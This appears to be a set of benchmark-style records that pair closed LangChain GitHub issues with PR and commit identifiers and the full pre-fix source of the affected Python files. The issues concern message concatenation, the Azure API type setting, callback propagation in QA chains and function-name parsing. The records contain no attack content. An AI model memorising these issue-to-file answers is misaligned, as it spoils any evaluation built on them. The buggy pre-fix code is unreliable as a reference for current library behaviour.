"source": "/docs/use_cases/question_answering//document-context-aware-QA",
"destination": "/docs/use_cases/question_answering/how_to/document-context-aware-QA"
},
{
"source": "/docs/modules/chains/additional/flare",
"destination": "/docs/use_cases/question_answering/how_to/flare"
},
{
"source": "/docs/modules/chains/additional/hyde",
"destination": "/docs/use_cases/question_answering/how_to/hyde"
},
{
"source": "/docs/use_cases/question_answering//local_retrieval_qa",
"destination": "/docs/use_cases/question_answering/how_to/local_retrieval_qa"
},
{
"source": "/docs/modules/chains/additional/qa_citations",
"destination": "/docs/use_cases/question_answering/how_to/qa_citations"
},
{
"source": "/docs/modules/chains/additional/vector_db_text_generation",
"destination": "/docs/use_cases/question_answering/how_to/vector_db_text_generation"
},
{
"source": "/docs/modules/chains/additional/openai_functions_retrieval_qa",
"destination": "/docs/use_cases/question_answering/integrations/openai_functions_retrieval_qa"
},
{
"source": "/docs/use_cases/question_answering//semantic-search-over-chat",
"destination": "/docs/use_cases/question_answering/integrations/semantic-search-over-chat"
},
{
"source": "/docs/modules/chains/additional/llm_checker",
"destination": "/docs/use_cases/self_check/llm_checker"
},
{
"source": "/docs/modules/chains/additional/llm_summarization_checker",
"destination": "/docs/use_cases/self_check/llm_summarization_checker"
},
{
"source": "/docs/modules/chains/additional/elasticsearch_database",
"destination": "/docs/use_cases/tabular/elasticsearch_database"
},
{
"source": "/docs/modules/chains/additional/tagging",
"destination": "/docs/use_cases/tagging"
}
]
} |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,472 | unsupported operand type(s) for +: 'SystemMessage' and 'HumanMessage' | ### System Info
Langchain version: 0.0.247
python version: 3.11.0
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
You can reproduce this issue according following link:
https://python.langchain.com/docs/modules/model_io/prompts/prompt_templates/prompts_pipelining
```
from langchain.prompts import ChatPromptTemplate, HumanMessagePromptTemplate
from langchain.schema import HumanMessage, AIMessage, SystemMessage
prompt = SystemMessage(content="You are a nice pirate")
new_prompt = (
prompt
+ HumanMessage(content="hi")
+ AIMessage(content="what?")
+ "{input}"
)
```
prompy + HumanMessage(content="hi") will generate this issue
### Expected behavior
operand + for 'SystemMessage' and 'HumanMessage' should be support | https://github.com/langchain-ai/langchain/issues/8472 | https://github.com/langchain-ai/langchain/pull/8489 | f31047a3941cd389a9b8c01446b097e3bfbb1235 | 1ec0b1837971bc58c54645c4ca515dc201788a82 | "2023-07-30T02:14:01Z" | python | "2023-08-02T14:51:44Z" | libs/langchain/langchain/schema/messages.py | from __future__ import annotations
from abc import abstractmethod
from typing import Any, Dict, List, Sequence
from pydantic import Field
from langchain.load.serializable import Serializable
def get_buffer_string(
messages: Sequence[BaseMessage], human_prefix: str = "Human", ai_prefix: str = "AI"
) -> str:
"""Convert sequence of Messages to strings and concatenate them into one string.
Args:
messages: Messages to be converted to strings.
human_prefix: The prefix to prepend to contents of HumanMessages.
ai_prefix: THe prefix to prepend to contents of AIMessages.
Returns:
A single string concatenation of all input messages.
Example:
.. code-block:: python
from langchain.schema import AIMessage, HumanMessage
messages = [
HumanMessage(content="Hi, how are you?"),
AIMessage(content="Good, how are you?"),
]
get_buffer_string(messages)
# -> "Human: Hi, how are you?\nAI: Good, how are you?"
"""
string_messages = []
for m in messages:
if isinstance(m, HumanMessage):
role = human_prefix
elif isinstance(m, AIMessage):
role = ai_prefix
elif isinstance(m, SystemMessage):
role = "System"
elif isinstance(m, FunctionMessage):
role = "Function"
elif isinstance(m, ChatMessage):
role = m.role
else:
raise ValueError(f"Got unsupported message type: {m}")
message = f"{role}: {m.content}"
if isinstance(m, AIMessage) and "function_call" in m.additional_kwargs:
message += f"{m.additional_kwargs['function_call']}"
string_messages.append(message)
return "\n".join(string_messages)
class BaseMessage(Serializable):
"""The base abstract Message class.
Messages are the inputs and outputs of ChatModels.
"""
content: str
"""The string contents of the message."""
additional_kwargs: dict = Field(default_factory=dict)
"""Any additional information."""
@property
@abstractmethod
def type(self) -> str:
"""Type of the Message, used for serialization."""
@property
def lc_serializable(self) -> bool:
"""Whether this class is LangChain serializable."""
return True
class BaseMessageChunk(BaseMessage):
def _merge_kwargs_dict(
self, left: Dict[str, Any], right: Dict[str, Any]
) -> Dict[str, Any]:
"""Merge additional_kwargs from another BaseMessageChunk into this one."""
merged = left.copy()
for k, v in right.items():
if k not in merged:
merged[k] = v
elif type(merged[k]) != type(v):
raise ValueError(
f'additional_kwargs["{k}"] already exists in this message,'
" but with a different type."
)
elif isinstance(merged[k], str):
merged[k] += v
elif isinstance(merged[k], dict):
merged[k] = self._merge_kwargs_dict(merged[k], v)
else:
raise ValueError(
f"Additional kwargs key {k} already exists in this message."
)
return merged
def __add__(self, other: Any) -> BaseMessageChunk:
if isinstance(other, BaseMessageChunk):
# If both are (subclasses of) BaseMessageChunk,
# concat into a single BaseMessageChunk
return self.__class__(
content=self.content + other.content,
additional_kwargs=self._merge_kwargs_dict(
self.additional_kwargs, other.additional_kwargs
),
)
else:
raise TypeError(
'unsupported operand type(s) for +: "'
f"{self.__class__.__name__}"
f'" and "{other.__class__.__name__}"'
)
class HumanMessage(BaseMessage):
"""A Message from a human."""
example: bool = False
"""Whether this Message is being passed in to the model as part of an example
conversation.
"""
@property
def type(self) -> str:
"""Type of the message, used for serialization."""
return "human"
class HumanMessageChunk(HumanMessage, BaseMessageChunk):
pass
class AIMessage(BaseMessage):
"""A Message from an AI."""
example: bool = False
"""Whether this Message is being passed in to the model as part of an example
conversation.
"""
@property
def type(self) -> str:
"""Type of the message, used for serialization."""
return "ai"
class AIMessageChunk(AIMessage, BaseMessageChunk):
pass
class SystemMessage(BaseMessage):
"""A Message for priming AI behavior, usually passed in as the first of a sequence
of input messages.
"""
@property
def type(self) -> str:
"""Type of the message, used for serialization."""
return "system"
class SystemMessageChunk(SystemMessage, BaseMessageChunk):
pass
class FunctionMessage(BaseMessage):
"""A Message for passing the result of executing a function back to a model."""
name: str
"""The name of the function that was executed."""
@property
def type(self) -> str:
"""Type of the message, used for serialization."""
return "function"
class FunctionMessageChunk(FunctionMessage, BaseMessageChunk):
pass
class ChatMessage(BaseMessage):
"""A Message that can be assigned an arbitrary speaker (i.e. role)."""
role: str
"""The speaker / role of the Message."""
@property
def type(self) -> str:
"""Type of the message, used for serialization."""
return "chat"
class ChatMessageChunk(ChatMessage, BaseMessageChunk):
pass
def _message_to_dict(message: BaseMessage) -> dict:
return {"type": message.type, "data": message.dict()}
def messages_to_dict(messages: Sequence[BaseMessage]) -> List[dict]:
"""Convert a sequence of Messages to a list of dictionaries.
Args:
messages: Sequence of messages (as BaseMessages) to convert.
Returns:
List of messages as dicts.
"""
return [_message_to_dict(m) for m in messages]
def _message_from_dict(message: dict) -> BaseMessage:
_type = message["type"]
if _type == "human":
return HumanMessage(**message["data"])
elif _type == "ai":
return AIMessage(**message["data"])
elif _type == "system":
return SystemMessage(**message["data"])
elif _type == "chat":
return ChatMessage(**message["data"])
elif _type == "function":
return FunctionMessage(**message["data"])
else:
raise ValueError(f"Got unexpected message type: {_type}")
def messages_from_dict(messages: List[dict]) -> List[BaseMessage]:
"""Convert a sequence of messages from dicts to Message objects.
Args:
messages: Sequence of messages (as dicts) to convert.
Returns:
List of messages (BaseMessages).
"""
return [_message_from_dict(m) for m in messages]
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 6,650 | [AzureChatOpenAI] openai_api_type can't be changed from the default 'azure' value | ### System Info
Hello,
during the development of an application that needs to authenticate to Azure services and use the wrapper [AzureChatOpenAi](https://github.com/hwchase17/langchain/blob/master/langchain/chat_models/azure_openai.py), we encountered an error due to the fact that the model could not use the 'azure_ad' type.
It seems that this class sets the openai_api_type always to the set default value of 'azure' even if we have an environment variable called 'OPENAI_API_TYPE' specifying 'azure_ad'.
Why is it so?
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
answering_llm=AzureChatOpenAI(
deployment_name=ANSWERING_MODEL_CONFIG.model_name,
model_name=ANSWERING_MODEL_CONFIG.model_type, #"gpt-3.5-turbo"
openai_api_type="azure_ad", # IF THIS IS NOT EXPLICITLY PASSED IT FAILS
openai_api_key=auth_token,
temperature=ANSWERING_MODEL_CONFIG.temperature,
max_tokens=ANSWERING_MODEL_CONFIG.max_tokens
)
### Expected behavior
We expect the wrapper to take the value of the environmental variable correctly. | https://github.com/langchain-ai/langchain/issues/6650 | https://github.com/langchain-ai/langchain/pull/8622 | 29f51055e8f7d060e6d3a5480591bef76652edae | e68a1d73d0c84503702a2bf66b52d7ae2336eb67 | "2023-06-23T14:09:47Z" | python | "2023-08-04T03:21:41Z" | libs/langchain/langchain/chat_models/azure_openai.py | """Azure OpenAI chat wrapper."""
from __future__ import annotations
import logging
from typing import Any, Dict, Mapping
from pydantic import root_validator
from langchain.chat_models.openai import ChatOpenAI
from langchain.schema import ChatResult
from langchain.utils import get_from_dict_or_env
logger = logging.getLogger(__name__)
class AzureChatOpenAI(ChatOpenAI):
"""Wrapper around Azure OpenAI Chat Completion API.
To use this class you
must have a deployed model on Azure OpenAI. Use `deployment_name` in the
constructor to refer to the "Model deployment name" in the Azure portal.
In addition, you should have the ``openai`` python package installed, and the
following environment variables set or passed in constructor in lower case:
- ``OPENAI_API_TYPE`` (default: ``azure``)
- ``OPENAI_API_KEY``
- ``OPENAI_API_BASE``
- ``OPENAI_API_VERSION``
- ``OPENAI_PROXY``
For example, if you have `gpt-35-turbo` deployed, with the deployment name
`35-turbo-dev`, the constructor should look like:
.. code-block:: python
AzureChatOpenAI(
deployment_name="35-turbo-dev",
openai_api_version="2023-05-15",
)
Be aware the API version may change.
Any parameters that are valid to be passed to the openai.create call can be passed
in, even if not explicitly saved on this class.
"""
deployment_name: str = ""
openai_api_type: str = "azure"
openai_api_base: str = ""
openai_api_version: str = ""
openai_api_key: str = ""
openai_organization: str = ""
openai_proxy: str = ""
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that api key and python package exists in environment."""
values["openai_api_key"] = get_from_dict_or_env(
values,
"openai_api_key",
"OPENAI_API_KEY",
)
values["openai_api_base"] = get_from_dict_or_env(
values,
"openai_api_base",
"OPENAI_API_BASE",
)
values["openai_api_version"] = get_from_dict_or_env(
values,
"openai_api_version",
"OPENAI_API_VERSION",
)
values["openai_api_type"] = get_from_dict_or_env(
values,
"openai_api_type",
"OPENAI_API_TYPE",
)
values["openai_organization"] = get_from_dict_or_env(
values,
"openai_organization",
"OPENAI_ORGANIZATION",
default="",
)
values["openai_proxy"] = get_from_dict_or_env(
values,
"openai_proxy",
"OPENAI_PROXY",
default="",
)
try:
import openai
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
try:
values["client"] = openai.ChatCompletion
except AttributeError:
raise ValueError(
"`openai` has no `ChatCompletion` attribute, this is likely "
"due to an old version of the openai package. Try upgrading it "
"with `pip install --upgrade openai`."
)
if values["n"] < 1:
raise ValueError("n must be at least 1.")
if values["n"] > 1 and values["streaming"]:
raise ValueError("n must be 1 when streaming.")
return values
@property
def _default_params(self) -> Dict[str, Any]:
"""Get the default parameters for calling OpenAI API."""
return {
**super()._default_params,
"engine": self.deployment_name,
}
@property
def _identifying_params(self) -> Dict[str, Any]:
"""Get the identifying parameters."""
return {**self._default_params}
@property
def _client_params(self) -> Dict[str, Any]:
"""Get the config params used for the openai client."""
return {
**super()._client_params,
"api_type": self.openai_api_type,
"api_version": self.openai_api_version,
}
@property
def _llm_type(self) -> str:
return "azure-openai-chat"
def _create_chat_result(self, response: Mapping[str, Any]) -> ChatResult:
for res in response["choices"]:
if res.get("finish_reason", None) == "content_filter":
raise ValueError(
"Azure has not provided the response due to a content"
" filter being triggered"
)
return super()._create_chat_result(response)
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,786 | RetrievalQA.from_chain_type: callbacks are not called for all nested chains | ### System Info
langchain: 0.0.252
python: 3.10.12
@agola11
### Who can help?
@agola11 please take a look,
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [X] Callbacks/Tracing
- [ ] Async
### Reproduction
1. Create a callback handler LogHandler for on_chain_start, on_chain_start, on_chat_model_start and log run_id, parent_run_id in each of them
2. Create a retrival chain and add this LogHandler
3. Add this LogHandler to llm as well
4. When running the chain, one of nested chain is not logged in between, because callbacks are not passed to that chain
### Expected behavior
All the nested chains should have callbacks defined.
| https://github.com/langchain-ai/langchain/issues/8786 | https://github.com/langchain-ai/langchain/pull/8787 | 5f1aab548731b53ebab00dd745a35ec7da52bf1c | 797c9e92c82f8e843b321ec2167bb1678ced03cf | "2023-08-05T06:43:10Z" | python | "2023-08-06T22:11:45Z" | libs/langchain/langchain/chains/question_answering/__init__.py | """Load question answering chains."""
from typing import Any, Mapping, Optional, Protocol
from langchain.callbacks.base import BaseCallbackManager
from langchain.callbacks.manager import Callbacks
from langchain.chains import ReduceDocumentsChain
from langchain.chains.combine_documents.base import BaseCombineDocumentsChain
from langchain.chains.combine_documents.map_reduce import MapReduceDocumentsChain
from langchain.chains.combine_documents.map_rerank import MapRerankDocumentsChain
from langchain.chains.combine_documents.refine import RefineDocumentsChain
from langchain.chains.combine_documents.stuff import StuffDocumentsChain
from langchain.chains.llm import LLMChain
from langchain.chains.question_answering import (
map_reduce_prompt,
refine_prompts,
stuff_prompt,
)
from langchain.chains.question_answering.map_rerank_prompt import (
PROMPT as MAP_RERANK_PROMPT,
)
from langchain.schema.language_model import BaseLanguageModel
from langchain.schema.prompt_template import BasePromptTemplate
class LoadingCallable(Protocol):
"""Interface for loading the combine documents chain."""
def __call__(
self, llm: BaseLanguageModel, **kwargs: Any
) -> BaseCombineDocumentsChain:
"""Callable to load the combine documents chain."""
def _load_map_rerank_chain(
llm: BaseLanguageModel,
prompt: BasePromptTemplate = MAP_RERANK_PROMPT,
verbose: bool = False,
document_variable_name: str = "context",
rank_key: str = "score",
answer_key: str = "answer",
callback_manager: Optional[BaseCallbackManager] = None,
callbacks: Callbacks = None,
**kwargs: Any,
) -> MapRerankDocumentsChain:
llm_chain = LLMChain(
llm=llm,
prompt=prompt,
verbose=verbose,
callback_manager=callback_manager,
callbacks=callbacks,
)
return MapRerankDocumentsChain(
llm_chain=llm_chain,
rank_key=rank_key,
answer_key=answer_key,
document_variable_name=document_variable_name,
verbose=verbose,
callback_manager=callback_manager,
**kwargs,
)
def _load_stuff_chain(
llm: BaseLanguageModel,
prompt: Optional[BasePromptTemplate] = None,
document_variable_name: str = "context",
verbose: Optional[bool] = None,
callback_manager: Optional[BaseCallbackManager] = None,
callbacks: Callbacks = None,
**kwargs: Any,
) -> StuffDocumentsChain:
_prompt = prompt or stuff_prompt.PROMPT_SELECTOR.get_prompt(llm)
llm_chain = LLMChain(
llm=llm,
prompt=_prompt,
verbose=verbose,
callback_manager=callback_manager,
callbacks=callbacks,
)
# TODO: document prompt
return StuffDocumentsChain(
llm_chain=llm_chain,
document_variable_name=document_variable_name,
verbose=verbose,
callback_manager=callback_manager,
**kwargs,
)
def _load_map_reduce_chain(
llm: BaseLanguageModel,
question_prompt: Optional[BasePromptTemplate] = None,
combine_prompt: Optional[BasePromptTemplate] = None,
combine_document_variable_name: str = "summaries",
map_reduce_document_variable_name: str = "context",
collapse_prompt: Optional[BasePromptTemplate] = None,
reduce_llm: Optional[BaseLanguageModel] = None,
collapse_llm: Optional[BaseLanguageModel] = None,
verbose: Optional[bool] = None,
callback_manager: Optional[BaseCallbackManager] = None,
callbacks: Callbacks = None,
token_max: int = 3000,
**kwargs: Any,
) -> MapReduceDocumentsChain:
_question_prompt = (
question_prompt or map_reduce_prompt.QUESTION_PROMPT_SELECTOR.get_prompt(llm)
)
_combine_prompt = (
combine_prompt or map_reduce_prompt.COMBINE_PROMPT_SELECTOR.get_prompt(llm)
)
map_chain = LLMChain(
llm=llm,
prompt=_question_prompt,
verbose=verbose,
callback_manager=callback_manager,
callbacks=callbacks,
)
_reduce_llm = reduce_llm or llm
reduce_chain = LLMChain(
llm=_reduce_llm,
prompt=_combine_prompt,
verbose=verbose,
callback_manager=callback_manager,
callbacks=callbacks,
)
# TODO: document prompt
combine_documents_chain = StuffDocumentsChain(
llm_chain=reduce_chain,
document_variable_name=combine_document_variable_name,
verbose=verbose,
callback_manager=callback_manager,
callbacks=callbacks,
)
if collapse_prompt is None:
collapse_chain = None
if collapse_llm is not None:
raise ValueError(
"collapse_llm provided, but collapse_prompt was not: please "
"provide one or stop providing collapse_llm."
)
else:
_collapse_llm = collapse_llm or llm
collapse_chain = StuffDocumentsChain(
llm_chain=LLMChain(
llm=_collapse_llm,
prompt=collapse_prompt,
verbose=verbose,
callback_manager=callback_manager,
callbacks=callbacks,
),
document_variable_name=combine_document_variable_name,
verbose=verbose,
callback_manager=callback_manager,
)
reduce_documents_chain = ReduceDocumentsChain(
combine_documents_chain=combine_documents_chain,
collapse_documents_chain=collapse_chain,
token_max=token_max,
verbose=verbose,
)
return MapReduceDocumentsChain(
llm_chain=map_chain,
document_variable_name=map_reduce_document_variable_name,
reduce_documents_chain=reduce_documents_chain,
verbose=verbose,
callback_manager=callback_manager,
callbacks=callbacks,
**kwargs,
)
def _load_refine_chain(
llm: BaseLanguageModel,
question_prompt: Optional[BasePromptTemplate] = None,
refine_prompt: Optional[BasePromptTemplate] = None,
document_variable_name: str = "context_str",
initial_response_name: str = "existing_answer",
refine_llm: Optional[BaseLanguageModel] = None,
verbose: Optional[bool] = None,
callback_manager: Optional[BaseCallbackManager] = None,
callbacks: Callbacks = None,
**kwargs: Any,
) -> RefineDocumentsChain:
_question_prompt = (
question_prompt or refine_prompts.QUESTION_PROMPT_SELECTOR.get_prompt(llm)
)
_refine_prompt = refine_prompt or refine_prompts.REFINE_PROMPT_SELECTOR.get_prompt(
llm
)
initial_chain = LLMChain(
llm=llm,
prompt=_question_prompt,
verbose=verbose,
callback_manager=callback_manager,
callbacks=callbacks,
)
_refine_llm = refine_llm or llm
refine_chain = LLMChain(
llm=_refine_llm,
prompt=_refine_prompt,
verbose=verbose,
callback_manager=callback_manager,
callbacks=callbacks,
)
return RefineDocumentsChain(
initial_llm_chain=initial_chain,
refine_llm_chain=refine_chain,
document_variable_name=document_variable_name,
initial_response_name=initial_response_name,
verbose=verbose,
callback_manager=callback_manager,
**kwargs,
)
def load_qa_chain(
llm: BaseLanguageModel,
chain_type: str = "stuff",
verbose: Optional[bool] = None,
callback_manager: Optional[BaseCallbackManager] = None,
**kwargs: Any,
) -> BaseCombineDocumentsChain:
"""Load question answering chain.
Args:
llm: Language Model to use in the chain.
chain_type: Type of document combining chain to use. Should be one of "stuff",
"map_reduce", "map_rerank", and "refine".
verbose: Whether chains should be run in verbose mode or not. Note that this
applies to all chains that make up the final chain.
callback_manager: Callback manager to use for the chain.
Returns:
A chain to use for question answering.
"""
loader_mapping: Mapping[str, LoadingCallable] = {
"stuff": _load_stuff_chain,
"map_reduce": _load_map_reduce_chain,
"refine": _load_refine_chain,
"map_rerank": _load_map_rerank_chain,
}
if chain_type not in loader_mapping:
raise ValueError(
f"Got unsupported chain type: {chain_type}. "
f"Should be one of {loader_mapping.keys()}"
)
return loader_mapping[chain_type](
llm, verbose=verbose, callback_manager=callback_manager, **kwargs
)
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 7,616 | _get_python_function_name does not work with classes | ### System Info
LangChain : v0.0.231
### Who can help?
@hwchase17
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
# Issue
`convert_to_openai_function` does not work as intended:
- Classes are not supported
- Any function without its source is not supported
# Reproduce
```python
from dataclasses import dataclass
from langchain.chains.openai_functions.base import (
convert_to_openai_function,
)
@dataclass
class System:
name: str
ram: int
convert_to_openai_function(System)
```
### Expected behavior
When calling `langchain.chains.openai_functions.base.convert_to_openai_function`, the subsequent call to `_get_python_function_name` fails because it tries to read source code (and cannot find it).
Something much simpler would be to access the `__name__` attribute of the callable.
| https://github.com/langchain-ai/langchain/issues/7616 | https://github.com/langchain-ai/langchain/pull/7617 | 797c9e92c82f8e843b321ec2167bb1678ced03cf | 4a7ebb7184fa5dad4cdfef49d1eab2a3e9029a2b | "2023-07-12T21:03:09Z" | python | "2023-08-06T22:12:03Z" | libs/langchain/langchain/chains/openai_functions/base.py | """Methods for creating chains that use OpenAI function-calling APIs."""
import inspect
import re
from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Type, Union
from pydantic import BaseModel
from langchain.base_language import BaseLanguageModel
from langchain.chains import LLMChain
from langchain.output_parsers.openai_functions import (
JsonOutputFunctionsParser,
PydanticAttrOutputFunctionsParser,
PydanticOutputFunctionsParser,
)
from langchain.prompts import BasePromptTemplate
from langchain.schema import BaseLLMOutputParser
PYTHON_TO_JSON_TYPES = {
"str": "string",
"int": "number",
"float": "number",
"bool": "boolean",
}
def _get_python_function_name(function: Callable) -> str:
"""Get the name of a Python function."""
source = inspect.getsource(function)
return re.search(r"^def (.*)\(", source).groups()[0] # type: ignore
def _parse_python_function_docstring(function: Callable) -> Tuple[str, dict]:
"""Parse the function and argument descriptions from the docstring of a function.
Assumes the function docstring follows Google Python style guide.
"""
docstring = inspect.getdoc(function)
if docstring:
docstring_blocks = docstring.split("\n\n")
descriptors = []
args_block = None
past_descriptors = False
for block in docstring_blocks:
if block.startswith("Args:"):
args_block = block
break
elif block.startswith("Returns:") or block.startswith("Example:"):
# Don't break in case Args come after
past_descriptors = True
elif not past_descriptors:
descriptors.append(block)
else:
continue
description = " ".join(descriptors)
else:
description = ""
args_block = None
arg_descriptions = {}
if args_block:
arg = None
for line in args_block.split("\n")[1:]:
if ":" in line:
arg, desc = line.split(":")
arg_descriptions[arg.strip()] = desc.strip()
elif arg:
arg_descriptions[arg.strip()] += " " + line.strip()
return description, arg_descriptions
def _get_python_function_arguments(function: Callable, arg_descriptions: dict) -> dict:
"""Get JsonSchema describing a Python functions arguments.
Assumes all function arguments are of primitive types (int, float, str, bool) or
are subclasses of pydantic.BaseModel.
"""
properties = {}
annotations = inspect.getfullargspec(function).annotations
for arg, arg_type in annotations.items():
if arg == "return":
continue
if isinstance(arg_type, type) and issubclass(arg_type, BaseModel):
properties[arg] = arg_type.schema()
elif arg_type.__name__ in PYTHON_TO_JSON_TYPES:
properties[arg] = {"type": PYTHON_TO_JSON_TYPES[arg_type.__name__]}
if arg in arg_descriptions:
if arg not in properties:
properties[arg] = {}
properties[arg]["description"] = arg_descriptions[arg]
return properties
def _get_python_function_required_args(function: Callable) -> List[str]:
"""Get the required arguments for a Python function."""
spec = inspect.getfullargspec(function)
required = spec.args[: -len(spec.defaults)] if spec.defaults else spec.args
required += [k for k in spec.kwonlyargs if k not in (spec.kwonlydefaults or {})]
return required
def convert_python_function_to_openai_function(function: Callable) -> Dict[str, Any]:
"""Convert a Python function to an OpenAI function-calling API compatible dict.
Assumes the Python function has type hints and a docstring with a description. If
the docstring has Google Python style argument descriptions, these will be
included as well.
"""
description, arg_descriptions = _parse_python_function_docstring(function)
return {
"name": _get_python_function_name(function),
"description": description,
"parameters": {
"type": "object",
"properties": _get_python_function_arguments(function, arg_descriptions),
"required": _get_python_function_required_args(function),
},
}
def convert_to_openai_function(
function: Union[Dict[str, Any], Type[BaseModel], Callable]
) -> Dict[str, Any]:
"""Convert a raw function/class to an OpenAI function.
Args:
function: Either a dictionary, a pydantic.BaseModel class, or a Python function.
If a dictionary is passed in, it is assumed to already be a valid OpenAI
function.
Returns:
A dict version of the passed in function which is compatible with the
OpenAI function-calling API.
"""
if isinstance(function, dict):
return function
elif isinstance(function, type) and issubclass(function, BaseModel):
schema = function.schema()
return {
"name": schema["title"],
"description": schema["description"],
"parameters": schema,
}
elif callable(function):
return convert_python_function_to_openai_function(function)
else:
raise ValueError(
f"Unsupported function type {type(function)}. Functions must be passed in"
f" as Dict, pydantic.BaseModel, or Callable."
)
def _get_openai_output_parser(
functions: Sequence[Union[Dict[str, Any], Type[BaseModel], Callable]],
function_names: Sequence[str],
) -> BaseLLMOutputParser:
"""Get the appropriate function output parser given the user functions."""
if isinstance(functions[0], type) and issubclass(functions[0], BaseModel):
if len(functions) > 1:
pydantic_schema: Union[Dict, Type[BaseModel]] = {
name: fn for name, fn in zip(function_names, functions)
}
else:
pydantic_schema = functions[0]
output_parser: BaseLLMOutputParser = PydanticOutputFunctionsParser(
pydantic_schema=pydantic_schema
)
else:
output_parser = JsonOutputFunctionsParser(args_only=len(functions) <= 1)
return output_parser
def create_openai_fn_chain(
functions: Sequence[Union[Dict[str, Any], Type[BaseModel], Callable]],
llm: BaseLanguageModel,
prompt: BasePromptTemplate,
*,
output_parser: Optional[BaseLLMOutputParser] = None,
**kwargs: Any,
) -> LLMChain:
"""Create an LLM chain that uses OpenAI functions.
Args:
functions: A sequence of either dictionaries, pydantic.BaseModels classes, or
Python functions. If dictionaries are passed in, they are assumed to
already be a valid OpenAI functions. If only a single
function is passed in, then it will be enforced that the model use that
function. pydantic.BaseModels and Python functions should have docstrings
describing what the function does. For best results, pydantic.BaseModels
should have descriptions of the parameters and Python functions should have
Google Python style args descriptions in the docstring. Additionally,
Python functions should only use primitive types (str, int, float, bool) or
pydantic.BaseModels for arguments.
llm: Language model to use, assumed to support the OpenAI function-calling API.
prompt: BasePromptTemplate to pass to the model.
output_parser: BaseLLMOutputParser to use for parsing model outputs. By default
will be inferred from the function types. If pydantic.BaseModels are passed
in, then the OutputParser will try to parse outputs using those. Otherwise
model outputs will simply be parsed as JSON. If multiple functions are
passed in and they are not pydantic.BaseModels, the chain output will
include both the name of the function that was returned and the arguments
to pass to the function.
Returns:
An LLMChain that will pass in the given functions to the model when run.
Example:
.. code-block:: python
from langchain.chains.openai_functions import create_openai_fn_chain
from langchain.chat_models import ChatOpenAI
from langchain.prompts import ChatPromptTemplate, HumanMessagePromptTemplate
from pydantic import BaseModel, Field
class RecordPerson(BaseModel):
\"\"\"Record some identifying information about a person.\"\"\"
name: str = Field(..., description="The person's name")
age: int = Field(..., description="The person's age")
fav_food: Optional[str] = Field(None, description="The person's favorite food")
class RecordDog(BaseModel):
\"\"\"Record some identifying information about a dog.\"\"\"
name: str = Field(..., description="The dog's name")
color: str = Field(..., description="The dog's color")
fav_food: Optional[str] = Field(None, description="The dog's favorite food")
llm = ChatOpenAI(model="gpt-3.5-turbo-0613", temperature=0)
prompt_msgs = [
SystemMessage(
content="You are a world class algorithm for recording entities"
),
HumanMessage(content="Make calls to the relevant function to record the entities in the following input:"),
HumanMessagePromptTemplate.from_template("{input}"),
HumanMessage(content="Tips: Make sure to answer in the correct format"),
]
prompt = ChatPromptTemplate(messages=prompt_msgs)
chain = create_openai_fn_chain([RecordPerson, RecordDog])
chain.run("Harry was a chubby brown beagle who loved chicken")
# -> RecordDog(name="Harry", color="brown", fav_food="chicken")
""" # noqa: E501
if not functions:
raise ValueError("Need to pass in at least one function. Received zero.")
openai_functions = [convert_to_openai_function(f) for f in functions]
fn_names = [oai_fn["name"] for oai_fn in openai_functions]
output_parser = output_parser or _get_openai_output_parser(functions, fn_names)
llm_kwargs: Dict[str, Any] = {
"functions": openai_functions,
}
if len(openai_functions) == 1:
llm_kwargs["function_call"] = {"name": openai_functions[0]["name"]}
llm_chain = LLMChain(
llm=llm,
prompt=prompt,
output_parser=output_parser,
llm_kwargs=llm_kwargs,
output_key="function",
**kwargs,
)
return llm_chain
def create_structured_output_chain(
output_schema: Union[Dict[str, Any], Type[BaseModel]],
llm: BaseLanguageModel,
prompt: BasePromptTemplate,
*,
output_parser: Optional[BaseLLMOutputParser] = None,
**kwargs: Any,
) -> LLMChain:
"""Create an LLMChain that uses an OpenAI function to get a structured output.
Args:
output_schema: Either a dictionary or pydantic.BaseModel class. If a dictionary
is passed in, it's assumed to already be a valid JsonSchema.
For best results, pydantic.BaseModels should have docstrings describing what
the schema represents and descriptions for the parameters.
llm: Language model to use, assumed to support the OpenAI function-calling API.
prompt: BasePromptTemplate to pass to the model.
output_parser: BaseLLMOutputParser to use for parsing model outputs. By default
will be inferred from the function types. If pydantic.BaseModels are passed
in, then the OutputParser will try to parse outputs using those. Otherwise
model outputs will simply be parsed as JSON.
Returns:
An LLMChain that will pass the given function to the model.
Example:
.. code-block:: python
from langchain.chains.openai_functions import create_structured_output_chain
from langchain.chat_models import ChatOpenAI
